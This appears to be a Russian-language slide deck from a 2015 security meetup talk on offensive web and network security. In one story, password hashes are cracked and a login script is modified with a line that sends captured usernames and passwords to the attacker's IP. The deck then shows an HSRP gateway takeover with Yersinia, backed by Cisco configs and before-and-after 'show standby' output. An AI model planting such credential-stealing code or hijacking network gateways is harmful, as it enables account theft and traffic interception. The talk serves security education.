Post on 23-Jul-2015
Как я перестал бояться и пришел к веб-безопасности
Илья СафроновGroup-IB
#securitymeetup
Начало
Продолжение
Продолжение
Продолжение
Cool Story
• Цель: получить доступ к веб-ресурсу• Анализ самого ресурса результатов не дал
Cмотрим соседей / Переносим зону
Ищем тех же разработчиков
Находим не совсем защищенный ресурс
(к сожалению, на другом хосте)Брутим хеши
Делаем кросс-чек по всем ресурсам на нужном хосте
Так как на новом хосте хеши не сбрутились, дописываем скрипт
логинаif (request.login):
send(request.login,request.password, FQDN, my_ip)
Пробуем все собранные учетки на целевом хосте
Атака на HSRP с помощью Yersinia
HSRP - HSRP (Hot Standby Router Protocol) — проприетарный протокол Cisco, предназначенный для увеличения доступности маршрутизаторов выполняющих роль шлюза по умолчанию.
Yersinia - сетевая утилита, позволяющая эксплуатировать недостатки ряда протоколов, использующихся активным сетевым оборудованием и сетевых протоколов, использующихся в сети.
Целевая сеть
R1(приоритет по умолчанию – 100):
interface FastEthernet0/0 ip address 172.16.40.10 255.255.255.0 standby 1 ip 172.16.40.1
R2:
interface FastEthernet0/0 ip address 172.16.40.20 255.255.255.0 standby 1 ip 172.16.40.1 standby 1 priority 90
До атаки
R1# show standbyFastEthernet0/0 - Group 1 State is Active2 state changes, last state change 00:43:11 Virtual IP address is 172.16.40.1 Active virtual MAC address is 0000.0c07.ac01Local virtual MAC address is 0000.0c07.ac01 (v1 default) Hello time 3 sec, hold time 10 secNext hello sent in 0.868 secs Preemption disabled Active router is local Standby router is 172.16.40.20, priority 90 (expires in 8.856 sec) Priority 100 (default 100) IP redundancy name is "hsrp-Fa0/0-1" (default)
Перехваченный пакет
Атака
Результат
R1# show standbyFastEthernet0/0 - Group 1 State is Standby4 state changes, last state change 00:00:57 Virtual IP address is 172.16.40.1 Active virtual MAC address is 000c.2960.d782Local virtual MAC address is 0000.0c07.ac01 (v1 default) Hello time 3 sec, hold time 10 secNext hello sent in 2.040 secs Preemption disabled Active router is 172.16.40.128, priority 255 (expires in 7.288 sec) Standby router is local Priority 100 (default 100) IP redundancy name is "hsrp-Fa0/0-1" (default)